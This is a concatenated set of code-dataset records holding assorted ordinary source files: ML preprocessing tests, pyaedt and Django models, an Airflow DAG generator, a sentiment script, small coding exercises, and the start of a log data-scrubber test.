lazy=True)\n","repo_name":"Chortzaberay/mg-eventsApi","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35988199105","text":"import itertools\n\nimport numpy as np\nimport pandas as pd\n\nfrom gama.data import format_x_y\nfrom gama.utilities.preprocessing import (\n find_categorical_columns,\n basic_encoding,\n basic_pipeline_extension,\n)\n\n\ndef test_format_x_y():\n \"\"\" X and y data get converted to (pd.DataFrame, pd.DataFrame). \"\"\"\n\n def well_formatted_x_y(x, y, y_type):\n assert isinstance(x, pd.DataFrame)\n assert isinstance(y, y_type)\n assert len(x) == len(y)\n\n from sklearn.datasets import load_digits\n\n X_np, y_np = load_digits(return_X_y=True)\n X_df, y_df = pd.DataFrame(X_np), pd.DataFrame(y_np)\n y_series = pd.Series(y_np)\n y_2d = y_np.reshape(-1, 1)\n\n for X, y in itertools.product([X_np, X_df], [y_np, y_series, y_df, y_2d]):\n well_formatted_x_y(*format_x_y(X, y), y_type=pd.Series)\n well_formatted_x_y(*format_x_y(X, y, y_type=pd.DataFrame), y_type=pd.DataFrame)\n\n\ndef test_format_x_y_missing_targets():\n \"\"\" Samples with missing labels should be removed from training data. \"\"\"\n\n def well_formatted_x_y(x, y, y_type):\n assert isinstance(x, pd.DataFrame)\n assert isinstance(y, y_type)\n assert len(x) == len(y)\n\n from sklearn.datasets import load_digits\n\n x, y = load_digits(return_X_y=True)\n y = y.astype(float)\n y[::2] = np.nan\n x_, y_ = format_x_y(x, y)\n\n assert (1797,) == y.shape\n assert (898,) == y_.shape\n assert np.array_equal(y[1::2], y_)\n assert np.array_equal(x[1::2, :], x_)\n well_formatted_x_y(x_, y_, y_type=pd.Series)\n\n\ndef test_find_categorical_columns():\n twelve = pd.Series(list(range(1, 13)), dtype=\"category\", name=\"twelve\")\n six = pd.Series([1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6], dtype=\"category\", name=\"six\")\n two = pd.Series([1, 2] * 6, dtype=\"category\", name=\"two\")\n two_nan = pd.Series([1, 2, np.nan] * 4, dtype=\"category\", name=\"two_nan\")\n df = pd.DataFrame({s.name: s for s in [two, two_nan, six, twelve]})\n assert [\"two\", \"two_nan\"] == list(find_categorical_columns(df, max_f=2))\n assert [\"two\"] == list(find_categorical_columns(df, max_f=2, ignore_nan=False))\n assert [\"six\"] == list(find_categorical_columns(df, min_f=5, max_f=10))\n assert [\"twelve\"] == list(find_categorical_columns(df, min_f=10))\n","repo_name":"emailhy/gama","sub_path":"tests/unit/test_preprocessing.py","file_name":"test_preprocessing.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"6294136452","text":"import math\n\nfrom pyaedt.edb_core.ipc2581.content.entry_line import EntryLine\nfrom pyaedt.edb_core.ipc2581.ecad.cad_data.assembly_drawing import AssemblyDrawing\nfrom pyaedt.edb_core.ipc2581.ecad.cad_data.outline import Outline\nfrom pyaedt.edb_core.ipc2581.ecad.cad_data.pin import Pin\nfrom pyaedt.edb_core.ipc2581.ecad.cad_data.polygon import PolyStep\nfrom pyaedt.generic.general_methods import ET\nfrom pyaedt.generic.general_methods import pyaedt_function_handler\n\n\nclass Package(object):\n \"\"\"Class describing an IPC2581 package definition.\"\"\"\n\n def __init__(self, ipc):\n self._ipc = ipc\n self.name = \"\"\n self.type = \"OTHER\"\n self.pin_one = \"1\"\n self.pin_orientation = \"OTHER\"\n self.height = 0.1\n self.assembly_drawing = AssemblyDrawing(self._ipc)\n self.outline = Outline(self._ipc)\n self._pins = []\n self.pickup_point = [0.0, 0.0]\n\n @property\n def pins(self):\n return self._pins\n\n @pins.setter\n def pins(self, value): # pragma no cover\n if isinstance(value, list):\n if len([pin for pin in value if isinstance(pin, Pin)]) == len(value):\n self._pins = value\n\n @pyaedt_function_handler()\n def add_pin(self, number=0, x=0.0, y=0.0, rotation=0.0, primitive_ref=\"\"): # pragma no cover\n added_pin = Pin()\n added_pin.x = x\n added_pin.y = y\n added_pin.rotation = rotation * 180 / math.pi\n added_pin.number = number\n added_pin.primitive_def = primitive_ref\n self.pins.append(added_pin)\n\n @pyaedt_function_handler()\n def add_component_outline(self, component): # pragma no cover\n if component:\n _bbox = component.bounding_box\n _rot = component.rotation\n average_x = (_bbox[0] + _bbox[2]) / 2\n average_y = (_bbox[1] + _bbox[3]) / 2\n bb1x = _bbox[0] - average_x\n bb1y = _bbox[1] - average_y\n bb2x = _bbox[2] - average_x\n bb2y = _bbox[3] - average_y\n\n bb1x_rot = bb1x\n bb2x_rot = bb2x\n bb1y_rot = bb1y\n bb2y_rot = bb2y\n if _rot >= math.pi / 4 and _rot <= 0.75 * math.pi:\n bb = bb1x_rot\n bb1x_rot = bb1y_rot\n bb1y_rot = bb\n bb = bb2x_rot\n bb2x_rot = bb2y_rot\n bb2y_rot = bb\n poly_step1 = PolyStep()\n poly_step2 = PolyStep()\n poly_step3 = PolyStep()\n poly_step4 = PolyStep()\n poly_step5 = PolyStep()\n poly_step1.x = str(self._ipc.from_meter_to_units(bb1x_rot, self._ipc.units))\n poly_step1.y = str(self._ipc.from_meter_to_units(bb1y_rot, self._ipc.units))\n poly_step2.x = str(self._ipc.from_meter_to_units(bb2x_rot, self._ipc.units))\n poly_step2.y = str(self._ipc.from_meter_to_units(bb1y_rot, self._ipc.units))\n poly_step3.x = str(self._ipc.from_meter_to_units(bb2x_rot, self._ipc.units))\n poly_step3.y = str(self._ipc.from_meter_to_units(bb2y_rot, self._ipc.units))\n poly_step4.x = str(self._ipc.from_meter_to_units(bb1x_rot, self._ipc.units))\n poly_step4.y = str(self._ipc.from_meter_to_units(bb2y_rot, self._ipc.units))\n poly_step5.x = str(self._ipc.from_meter_to_units(bb1x_rot, self._ipc.units))\n poly_step5.y = str(self._ipc.from_meter_to_units(bb1y_rot, self._ipc.units))\n self.outline.polygon.poly_steps = [poly_step1, poly_step2, poly_step3, poly_step4, poly_step5]\n if not \"ROUND_0\" in self._ipc.content.dict_line.dict_lines:\n entry_line = EntryLine()\n entry_line.line_width = 0.0\n self._ipc.content.dict_line.dict_lines[\"ROUND_0\"] = entry_line\n self.outline.line_ref = \"ROUND_0\"\n self.assembly_drawing.polygon.poly_steps = [poly_step1, poly_step2, poly_step3, poly_step4, poly_step5]\n self.assembly_drawing.line_ref = \"ROUND_0\"\n\n @pyaedt_function_handler()\n def write_xml(self, step): # pragma no cover\n package = ET.SubElement(step, \"Package\")\n package.set(\"name\", self.name)\n package.set(\"type\", self.type)\n package.set(\"pinOne\", self.pin_one)\n package.set(\"pinOneOrientation\", self.pin_orientation)\n package.set(\"height\", str(self.height))\n self.outline.write_xml(package)\n self.assembly_drawing.write_xml(package)\n for pin in self.pins:\n pin.write_xml(package)\n","repo_name":"ansys/pyaedt","sub_path":"pyaedt/edb_core/ipc2581/ecad/cad_data/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"7"} +{"seq_id":"37196044077","text":"import shutil\n\nfrom datetime import datetime\n\n\ndef create_dag(target_path, template_path, dag_id, hyperparameters):\n \"\"\"\n Given the hyperparameters of a model, this function creates a DAG by using a defined template. The dag id\n and the hyperparameters of the model are arguments that replace spaces in the base template to create the final\n python file (DAG).\n\n Parameters\n ----------\n target_path: indicates where the DAG is saved (DAG folder). (str)\n dag_id: corresponds to the model name encoded by its hyperparameters. (str)\n hyperparameters: list that contains the values of each hyperparameter. (lst)\n\n Returns\n -------\n Custom python file according to the model and its hyperparameters, created in the DAG folder. (.py)\n \"\"\"\n # Initially, we go to the first day of the actual month\n input_dt = datetime.now().date()\n first = input_dt.replace(day=1)\n start_date = 'datetime(' + str(first).replace('-0', ', ') + ')'\n\n # Initialize all possible hyperparameters with 'np.nan' string\n all_hyper = []\n for i in range(0, len(hyperparameters)):\n all_hyper.append('np.nan')\n\n # Get the type of model selected by the user\n model_type = dag_id.split('_')[0]\n\n # If it is a linear regressor model, get its hyperparameters\n if model_type == 'linear':\n all_hyper[0] = str(hyperparameters[0])\n all_hyper[1] = str(int(hyperparameters[1]))\n\n # If it is a decision tree model, get its hyperparameters\n elif model_type == 'decision':\n all_hyper[2] = str(int(hyperparameters[2]))\n # The max_leaf_nodes can be an integer or a string\n if str(hyperparameters[3]) == 'None':\n all_hyper[3] = str(hyperparameters[3])\n else:\n all_hyper[3] = str(int(hyperparameters[3]))\n all_hyper[4] = str(hyperparameters[4])\n\n # If it is a gradient boosting model, get its hyperparameters\n elif model_type == 'gradient':\n all_hyper[5] = str(hyperparameters[5])\n all_hyper[6] = str(int(hyperparameters[6]))\n all_hyper[7] = str(int(hyperparameters[7]))\n all_hyper[8] = str(hyperparameters[8])\n\n # There are no more type models implemented\n else:\n raise Exception('Model name not implemented.')\n\n # Copy the template into the target path\n shutil.copyfile(template_path, target_path)\n\n # Replace the variables in the created file\n replacements = {'dag_id_model': \"'\"+dag_id+\"'\",\n 'fit_intercept_model': all_hyper[0],\n 'n_jobs_model': all_hyper[1],\n 'd_max_depth_model': all_hyper[2],\n 'max_leaf_nodes_model': all_hyper[3],\n 'd_max_features_model': all_hyper[4],\n 'learning_rate_model': all_hyper[5],\n 'n_estimators_model': all_hyper[6],\n 'g_max_depth_model': all_hyper[7],\n 'g_max_features_model': all_hyper[8],\n 'start_date_change': start_date}\n\n lines = []\n with open(target_path) as infile:\n for line in infile:\n for src, target in replacements.items():\n line = line.replace(src, target)\n lines.append(line)\n with open(target_path, 'w') as outfile:\n for line in lines:\n outfile.write(line)\n\n\n","repo_name":"iAguila98/mlops","sub_path":"MLOps_Airflow/shared_volume/scripts/file_creation.py","file_name":"file_creation.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41802012714","text":"# 'param' is valid as is a function parameter and\n# will always be bound\ndef foo(param: int) -> str:\n a = 20 # valid, declared in the functions \"global\" scope\n\n # 'b' is declared only inside if:\n # not valid in the outer environment\n if a == param:\n b = \"equal\"\n\n return b # 'b' cannot be used, might not be declared -> error\n\n\n# 'x' is valid because is declared in the global scope\nx = 10\n\n# 'a' is declared inside if branch.\n# 'b' is declared inside else branch.\n# both are not valid in the outer environment: only one of them will be declared on runtime -> error\n\nif x == 10:\n a = x\nelse:\n b = 20\n","repo_name":"Viniciusvcr/bethon","sub_path":"tests/fail/possibly_unbound.py","file_name":"possibly_unbound.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"11027473845","text":"#!python3.5\n\nimport sys\nimport io\nimport math\nimport functools\n\nTEST = \"\"\"3\n3\n4\n5000\"\"\"\n\n# def fib(n):\n# inverseSqrt5 = 0.44721359549995793928183473374626\n# phi = 1.6180339887498948482045868343656\n# return int(math.floor(math.pow(phi, n) * inverseSqrt5 + 0.5))\n\ndef solve(reader):\n test_cases=reader.readline()\n\n for i in range(int(test_cases)):\n N = int(reader.readline().strip())\n\n #v = math.ceil((N - 1 + math.log10(math.sqrt(5))) / math.log10((1+math.sqrt(5))/2))\n\n # the nth fib number is ceil(phi^n / sqrt(5)).\n # Saying a number contains N digits is the same as saying it's\n # greater than 10^(N-1)\n # So we need phi^n/sqrt(5) > 10^(N-1)\n # n * log10(phi) - log10(5)/2 > (N-1) * log10(10)\n # n * log10(phi) > (N-1) * log10(10) + log10(5)/2\n # n > ((N-1) * log10(10) + log10(5) / 2) / log10(phi)\n phi = 1.6180339887498948482045868343656\n v = math.ceil((N-1 * math.log10(10) + math.log10(5) / 2) / math.log10(phi))\n print(v)\n\ndef main():\n # for testing purposes\n if len(sys.argv) == 2 and sys.argv[1] == \"test\":\n solve(io.StringIO(TEST))\n return\n solve(sys.stdin)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kdar/challenges","sub_path":"hackerrank/contests/project_euler/python3/p0025_n-digit_fibonacci_number.py","file_name":"p0025_n-digit_fibonacci_number.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71186364736","text":"from django.db import models\n\n\nSTATUS = (\n ('active', 'Active'),\n ('archived', 'Archived'),\n ('deleted', 'Deleted')\n)\n\nDIMENSION_UNIT = ((\"cm\", \"Centemter\"), (\"m\", \"Meter\"))\n\nWEIGHT_UNIT = ((\"kg\", \"Kilogram\"), (\"g\", \"Gram\"), (\"ml\", \"ML\"), (\"lb\", \"LB\"), (\"l\", \"L\"))\n\n# Create your models here.\nclass TimeStamp(models.Model):\n created_at = models.DateTimeField(auto_now_add=True, null=True, blank=True)\n updated_at = models.DateTimeField(auto_now=True, null=True, blank=True)\n status = models.CharField(max_length=20, default=\"active\", choices=STATUS)\n\n class Meta:\n abstract = True\n\n\n\nclass Brands(TimeStamp):\n # business_id = models.IntegerField(db_column='id', primary_key=True)\n brand_name = models.CharField(db_column='brand_name', max_length=100, null=True, blank=True)\n description = models.TextField(db_column='description', null=True, blank=True)\n slug = models.CharField(db_column='slug', max_length=100, null=True, blank=True)\n # images = models.ImageField()\n\n status = models.CharField(max_length=50, default=\"active\", choices=STATUS)\n\n\n class Meta:\n managed = True\n db_table = 'brands'\n\n def __str__(self):\n return str(self.brand_name)\n\n\nclass Departments(TimeStamp):\n title = models.CharField(db_column='title', max_length=100, null=True, blank=True)\n description = models.TextField(db_column='description', null=True, blank=True)\n slug = models.CharField(db_column='slug', max_length=100, null=True, blank=True)\n # images = models.ImageField()\n status = models.CharField(db_column='status', max_length=50, default=\"Active\", choices=STATUS)\n\n\n class Meta:\n managed = True\n db_table = 'departments'\n\n def __str__(self):\n return str(self.title)\n\n\n\nclass Categories(TimeStamp):\n title = models.CharField(db_column='title', max_length=100, null=True, blank=True)\n description = models.TextField(db_column='description', null=True, blank=True)\n slug = models.CharField(db_column='slug', max_length=100, null=True, blank=True)\n # images = models.ImageField()\n department = models.ForeignKey(Departments, db_column='department_id', null=True, blank=True, on_delete=models.SET_NULL)\n\n status = models.CharField(db_column='status', max_length=50, default=\"Active\", choices=STATUS)\n\n class Meta:\n managed = True\n db_table = 'categories'\n\n def __str__(self):\n return str(self.title)\n\n\nclass SubCategories(TimeStamp):\n title = models.CharField(db_column='title', max_length=100, null=True, blank=True)\n description = models.TextField(db_column='description', null=True, blank=True)\n slug = models.CharField(db_column='slug', max_length=100, null=True, blank=True)\n # images = models.ImageField()\n category = models.ForeignKey(Categories, db_column='category_id', null=True, blank=True, on_delete=models.CASCADE)\n\n status = models.CharField(db_column='status', max_length=50, default=\"active\", choices=STATUS)\n\n class Meta:\n managed = True\n db_table = 'sub_categories'\n\n def __str__(self):\n return str(self.title)\n\n\nclass Products(models.Model):\n # business_id = models.IntegerField(db_column='id', primary_key=True)\n sku = models.CharField(db_column='sku', max_length=50, null=True, blank=True, unique=True)\n barcode = models.CharField(db_column='barcode', max_length=100, null=True, blank=True)\n name = models.CharField(db_column='name', max_length=100, null=True, blank=True)\n title = models.CharField(db_column='title', max_length=50, null=True, blank=True)\n description = models.TextField(db_column='description', max_length=500, null=True, blank=True)\n\n\n weight = models.DecimalField(db_column='weight', max_digits=20, decimal_places=5, default=0.0)\n height = models.DecimalField(db_column='height', max_digits=20, decimal_places=5, default=0.0)\n width = models.DecimalField(db_column='width', max_digits=20, decimal_places=5, default=0.0)\n length = models.DecimalField(db_column='length', max_digits=20, decimal_places=5, default=0.0)\n\n # product_type = models.CharField(db_column='type', max_length=200, null=True, blank=True, choices=PRODUCT_TYPE)\n # pack_type = models.CharField(db_column='pack_type', max_length=20, choices=PACK_TYPE)\n # product_status = models.CharField(db_column='product_status', max_length=20, choices=PRODUCT_STATUS, default=\"unapproved\")\n\n # slug = models.CharField(db_column='slug', max_length=100, null=True, blank=True)\n # quantity_in_pack = models.PositiveSmallIntegerField(db_column='quantity_in_pack', null=True, blank=True)\n\n # created_by_user = models.ForeignKey(Users, db_column='created_by_user_id', on_delete=models.SET_NULL, null=True, blank=True)\n brand = models.ForeignKey(Brands, db_column='brand_id', null=True, blank=True, on_delete=models.CASCADE)\n department = models.ForeignKey(Departments, db_column='department_id', null=True, blank=True, on_delete=models.CASCADE)\n category = models.ForeignKey(Categories, db_column='category_id', null=True, blank=True, on_delete=models.CASCADE)\n sub_category = models.ForeignKey(SubCategories, db_column='sub_category_id', null=True, blank=True, on_delete=models.CASCADE)\n\n # images = models.ImageField()\n status = models.CharField(db_column='status', max_length=50, default=\"Active\", choices=STATUS)\n\n\n\n class Meta:\n managed = True\n db_table = 'products'\n\n def __str__(self):\n return str(self.name)\n","repo_name":"mamun1980/charlirest","sub_path":"src/apps/product/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8999690445","text":"import sys\n# sys.stdin = open('num.txt', 'r')\ninput = sys.stdin.readline\n\n\nfrom collections import deque\n\nn = int(input())\n\ngraph = [list(map(int, input().strip())) for i in range(n)]\n\n# print(graph)\n# [[0, 1, 1, 0, 1, 0, 0], [0, 1, 1, 0, 1, 0, 1], [1, 1, 1, 0, 1, 0, 1], [0, 0, 0, 0, 1, 1, 1], [0, 1, 0, 0, 0, 0, 0], [0, 1, 1, 1, 1, 1, 0], [0, 1, 1, 1, 0, 0, 0]]\n\nqueue = deque()\ncnt = 0 # 단지 수\ncnt_house = 0 # 단지 내 집 수\nlist_house = [] # 을 리스트에 넣은것\ndy = [-1, 1, 0, 0] #상하좌우\ndx = [0, 0, -1, 1]\n\nfor y in range(n):\n for x in range(n):\n if graph[y][x] == 0:\n continue\n queue.append((y, x))\n graph[y][x] = 0\n cnt += 1\n cnt_house = 1\n while queue:\n r, c = queue.popleft()\n for d in range(4):\n ny = r + dy[d]\n nx = c + dx[d]\n if 0 <= ny < n and 0 <= nx < n and graph[ny][nx] == 1:\n graph[ny][nx] = 0 #방문처리\n cnt_house += 1\n queue.append((ny, nx))\n # cnt += 1\n list_house.append(cnt_house)\nlist_house.sort()\nprint(cnt)\nif list_house:\n for i in list_house:\n print(i)\nelse:\n print(cnt)\n","repo_name":"Raven712/TIL","sub_path":"7주/35일(DB,DFS,BFS)/bj2667_retry.py","file_name":"bj2667_retry.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16905428281","text":"#https://www.hackerrank.com/challenges/ginorts/problem\ns = input()\nlower,upper,even,odd = [],[],[],[]\nfor i in s:\n if i.isalpha():\n if i.islower(): lower.append(i)\n if i.isupper(): upper.append(i)\n if i.isdigit():\n if int(i)%2 == 0: even.append(i)\n else:\n odd.append(i)\nprint(\"\".join((*sorted(lower),*sorted(upper),*sorted(odd),*sorted(even))))\n","repo_name":"Siriapps/hackerrankPython","sub_path":"ginortS.py","file_name":"ginortS.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12268080791","text":"import fedmsg.meta.base\nfrom fedmsg_meta_fedora_infrastructure.fasshim import avatar_url\n\n\nclass AbstractCoprConglomerator(fedmsg.meta.base.BaseConglomerator):\n def can_handle(self, msg, **config):\n return '.copr.' in msg['topic']\n\n def merge(self, constituents, subject, **config):\n ms = constituents # shorthand\n\n agents = set([m['msg']['user'] for m in ms if m['msg']['user']])\n coprs = set([m['msg']['copr'] for m in ms])\n count = len([1 for m in ms\n if m['topic'].endswith('copr.build.start')])\n\n if count > 0:\n subtitle = '{agents} kicked off {count} {rebuild_predicate} ' + \\\n 'of the {coprs} {copr_predicate}'\n else:\n # If count is zero, then there are zero start messages in the\n # constituents list, so change tack and render \"finishes\" instead\n # of \"starts\".\n count = len(ms)\n subtitle = 'The {coprs} {copr_predicate} finished ' + \\\n '{count} {rebuild_predicate} by {agents}'\n\n rebuild_predicate = 'rebuilds' if count > 1 else 'rebuild'\n copr_predicate = 'coprs' if len(coprs) > 1 else 'copr'\n\n agents = self.list_to_series(agents)\n coprs = self.list_to_series(coprs)\n\n tmpl = self.produce_template(constituents, subject, **config)\n tmpl['subtitle'] = subtitle.format(\n agents=agents, count=count, coprs=coprs,\n copr_predicate=copr_predicate, rebuild_predicate=rebuild_predicate)\n tmpl['subjective'] = tmpl['subtitle']\n\n default = tmpl['icon']\n\n tmpl['secondary_icon'] = self.get_secondary_icon(constituents, default)\n tmpl['link'] = self.get_link(constituents)\n\n return tmpl\n\n\nclass ByCopr(AbstractCoprConglomerator):\n def matches(self, a, b, **config):\n a, b = a['msg'], b['msg']\n if a['copr'] != b['copr']:\n return False\n return True\n\n def get_secondary_icon(self, constituents, default):\n agents = set([m['msg']['user'] for m in constituents])\n if len(agents) == 1:\n user = constituents[0]['msg']['user']\n return avatar_url(user)\n else:\n return 'https://apps.fedoraproject.org/img/icons/copr.png'\n\n def get_link(self, constituents):\n owner = constituents[0]['msg']['owner']\n copr = constituents[0]['msg']['copr']\n return 'https://copr.fedoraproject.org/coprs/%s/%s/' % (owner, copr)\n\n\nclass ByUser(AbstractCoprConglomerator):\n def matches(self, a, b, **config):\n a, b = a['msg'], b['msg']\n if a['user'] != b['user']:\n return False\n return True\n\n def get_secondary_icon(self, constituents, default):\n user = constituents[0]['msg']['user']\n return avatar_url(user)\n\n def get_link(self, constituents):\n user = constituents[0]['msg']['user']\n return 'https://copr.fedoraproject.org/coprs/' + user\n","repo_name":"fedora-infra/fedmsg_meta_fedora_infrastructure","sub_path":"fedmsg_meta_fedora_infrastructure/conglomerators/copr/copr.py","file_name":"copr.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"79"} +{"seq_id":"30008391219","text":"from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nimport csv\nimport re\nimport os\n\n\"\"\"\nThis function will calculate the sentiment values for each comment in the\ntraining and testing files using vader and store the results into \nfiles referenced later\n\"\"\"\ndef run(testCsvFile,trainCsvFile,testSentimentFile,trainSentimentFile,\\\n singQuote, workDir): \n words = {}\n\n lineCount = 0;\n \n analyzer = SentimentIntensityAnalyzer()\n \n allOutput = \"\";\n with open(testCsvFile, mode='r') as csv_file:\n \tcsv_reader = csv.DictReader(csv_file)\n \tfor row in csv_reader:\n \t\tif lineCount == 0:\n \t\t\tlineCount += 1\n \t\tlineCount += 1\n \t\tvs = analyzer.polarity_scores(row[\"comment_text\"])\n \t\tallOutput += str(row[\"id\"])+','+str(vs[\"neg\"])+','+\\\n str(vs[\"neu\"])+','+str(vs[\"pos\"])+','+str(vs[\"compound\"])+\"\\n\"\n \n with open(testSentimentFile,\"w\") as output:\n \toutput.write(allOutput)\n \n allOutput = \"\";\n with open(trainCsvFile, mode='r') as csv_file:\n \tcsv_reader = csv.DictReader(csv_file)\n \tfor row in csv_reader:\n \t\tif lineCount == 0:\n \t\t\tlineCount += 1\n \t\tlineCount += 1\n \t\tvs = analyzer.polarity_scores(row[\"comment_text\"])\n \t\tallOutput += str(row[\"id\"])+','+str(vs[\"neg\"])+','\\\n +str(vs[\"neu\"])+','+str(vs[\"pos\"])+','+str(vs[\"compound\"])+\"\\n\"\n \t\tif singQuote:\n \t\t\trow[\"comment_text\"] = re.sub('[^a-zA-Z0-9\\']+',' ', \\\n row[\"comment_text\"])\n \t\telse:\n \t\t\trow[\"comment_text\"] = re.sub('[^a-zA-Z0-9]+',' ', \\\n row[\"comment_text\"])\n \t\trow[\"comment_text\"] = re.sub('\\s+',' ',row[\"comment_text\"])\n \t\trow[\"comment_text\"] = re.sub('^\\s+','',row[\"comment_text\"])\n \t\trow[\"comment_text\"] = re.sub('\\s+$','',row[\"comment_text\"]).lower()\n \t\tarr = row[\"comment_text\"].split(' ')\n \t\tfor j in range(0,len(arr)):\n \t\t\tif not re.search(\"^\\w+'\\w+$\",arr[j]):\n \t\t\t\tcontinue\n \t\t\tif re.search(\"^\\w+'\\w+$\",arr[j]) and arr[j] not in words:\n \t\t\t\tprint(arr[j])\n \t\t\tif arr[j] not in words:\n \t\t\t\twords[arr[j]] = \"\"\n \t\t\twords[arr[j]] += str(row[\"id\"])+','+str(row[\"target\"])+','\\\n +str(vs[\"neg\"])+','\\\n +str(vs[\"neu\"])+','+str(vs[\"pos\"])+','\\\n +str(vs[\"compound\"])+\"\\n\"\n \n \n with open(trainSentimentFile,\"w\") as output:\n \toutput.write(allOutput)\n\n if not os.exists(workDir+\"/words\"):\n os.system(\"mkdir \" + workDir+\"/words\")\n with open(workDir+\"/wordsList.txt\",mode=\"w\") as wordListFile:\n for word in words:\n wordListFile.write(word+\"\\n\")\n with open(workDir+\"/words/\"+word+\".csv\") as output:\n output.write(words[word])\n","repo_name":"abfarahani/Toxicity-Classification","sub_path":"src/calcWordSentiment.py","file_name":"calcWordSentiment.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"18517537140","text":"n=int(input(\"min:\"))\nm=int(input(\"max:\"))\na=[]\nwhile n<=m:\n s=[]\n while n!=1:\n if n%2==0:\n n=int(n//2)\n s.append(n)\n elif n%2==1:\n n=int(3*n+1)\n s.append(n)\n a.append(len(s))\n print(len(s))\n n=n+1\nprint(a)\n","repo_name":"eisbetterthanpi/python","sub_path":"c c c.py","file_name":"c c c.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30225528021","text":"import subprocess\nimport os\nimport torch\nimport shutil\n\nprint(\"检测是否有可用的CUDA设备中……\")\n# 检查是否有可用的CUDA设备\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\n print(\"加速成功!使用的设备:CUDA\")\nelse:\n device = torch.device(\"cpu\")\n print(\"加速失败!使用的设备:CPU\")\n\nprint(\"\\n请选择蒙版生成算法\")\nprint(\"1. 快速,速度快但质量稍差\")\nprint(\"2. 标准,质量更好\")\n\n# 定义需要处理的视频文件路径\nfolder_path = os.path.dirname(os.getcwd())\n\n# 定义输出图片和蒙版的目录\nframe_out_dir = os.path.join(folder_path, \"video_frame\")\nmask_out_dir = os.path.join(folder_path, \"video_mask\")\n\n# 蒙版目录存在就删除\nif os.path.exists(mask_out_dir):\n shutil.rmtree(mask_out_dir)\n# 创建蒙版输出目录\nos.makedirs(mask_out_dir)\n\n# 设置Torch不使用图形界面显示\nos.environ[\"PYTORCH_JIT\"] = \"1\"\n\n# 使用CUDA进行加速\ntorch.set_grad_enabled(False)\n\n# 选择蒙版生成模式\nchoice2 = input(\"请输入蒙版算法的编号:\")\nif choice2 == '1':\n print(\"你选择了快速模式\")\n print(\"开始生成蒙版,请注意查看进度。根据图片数量,时间可能很长。\\n你可以随时按Ctrl+C停止生成。\")\n subprocess.run(\n ['transparent-background', '--source', frame_out_dir, '--dest', mask_out_dir, '--type', 'map', '--fast'])\nelse:\n print(\"你选择了标准模式\")\n print(\"开始生成蒙版,请注意查看进度。根据图片数量,时间可能很长。\\n你可以随时按Ctrl+C停止生成。\")\n subprocess.run(['transparent-background', '--source', frame_out_dir, '--dest', mask_out_dir, '--type', 'map'])\n\n# 开始修正蒙版名称\nfiles = sorted(os.listdir(mask_out_dir))\n\n# 遍历文件列表\nfor filename in files:\n if filename.lower().endswith('.png'):\n file_name, n1 = map(str, filename.split('_'))\n new_file = f'{file_name}.png'\n\n # 构建文件完整路径\n file_path = os.path.join(mask_out_dir, filename)\n new_file_path = os.path.join(mask_out_dir, new_file)\n\n # 重命名文件\n os.rename(file_path, new_file_path)\n\nprint(\"蒙版文件生成完成!\")\n\n# 是否进行下一步\nchoice = input(\"\\n是否直接开始下一步,把视频帧和蒙版进行裁切?\\n1. 是\\n2. 否\\n请输入你的选择:\")\nif choice == \"1\":\n subprocess.run(['python', '03_CropImage.py'])\nelse:\n quit()\n","repo_name":"ainanoha/AetherConverTools","sub_path":"bin/02_MaskCreation.py","file_name":"02_MaskCreation.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"31620438444","text":"import sys\n#sys.stdin.read 이렇게 사용하면 ctrl+D, 즉 EOF가 입력될때까지 입력을 받음\ninput = sys.stdin.read\n#파이썬에서 *을 사용하면 입력값이 정해지지 않았을 때를 의미(가변인자)\nn, *arr = input().split()\nfor i in range(len(arr)):\n #파이썬에서 리스트를 뒤집는 방법으로, [::-1]은 슬라이싱 기법\n #요소를 처음부터 끝까지 역순으로 뒤집는 것을 의미\n arr[i] = arr[i][::-1]\narr = list(map(int, arr))\narr = sorted(arr)\nfor i in range(len(arr)):\n print(arr[i])","repo_name":"seyeon22222/Self_study","sub_path":"Sort2/Reverse_sort(5648).py","file_name":"Reverse_sort(5648).py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"530109774","text":"import pytest\n\nfrom apigateway.biz.access_log.data_scrubber import DataScrubber\nfrom apigateway.biz.access_log.exceptions import NotScrubbedException\n\n\nclass TestDataScrubber:\n @pytest.mark.parametrize(\n \"content, expected\",\n [\n (\"\", False),\n ('{\"app_code\": \"test\"}', False),\n ('{\"app_secret\": \"xxx\"}', True),\n ('{\"bk_ticket\": \"xxx\"}', True),\n ],\n )\n def test_contains_sensitive_data(self, content, expected):\n data_scrubber = DataScrubber()\n result = 